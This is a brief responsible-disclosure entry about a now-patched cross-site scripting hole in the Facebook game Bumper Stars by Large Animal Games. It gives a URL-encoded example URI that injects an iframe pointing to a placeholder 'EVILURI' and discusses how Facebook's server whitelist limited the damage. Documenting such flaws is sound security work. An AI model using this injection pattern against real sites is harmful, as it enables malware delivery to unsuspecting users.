Facebook Verified Application
Current Monthly Active Users: 55,431
Current Rank on Application Leaderboard: 659
Application Developer: Large Animal Games
Responsiveness: LAG did not send any messages, but did patch the hole within a day or two. Actually, LAG was very responsive and moved swiftly to fix the holes, replying within minutes and posting a fix within hours. But for some reason, Gmail flagged the messages as spam and thus I didn’t notice them. My apologies to LAG, they did great work and I appreciate it!
Vulnerability Status: Patched
Capable of Clickjacking Install: Yes
Example URI: http://apps.facebook.com/bumperstars/invite.php?tp_code=%22%2F%3E%3Cfb%3Aiframe+src%3D%22EVILURI%22%3E
Notes: You’ll notice the example URI only inserts an iframe, rather than attempting the sort of double-injection of previous examples. Bumper Stars, and two other Large Animal Games applications that will be posted soon, use Facebook’s server whitelist feature for API requests. This means that trying to use injected JavaScript to make API calls will fail, as they originate from the user’s computer and not LAG’s servers. One could still have used the XSS hole to launch a malware attack, but using the whitelist prevents stealing profile information or launching a viral attack via notifications and feed stories.
Bumper Stars was the first application I’ve encountered that made use of the server whitelist feature, and I commend LAG for that step. But while the feature can prevent many of the attacks I’ve outlined, it is not practical for every application. Many other developers make use of the JavaScript API for legitimate calls, and these would fail if the developer enabled a server whitelist.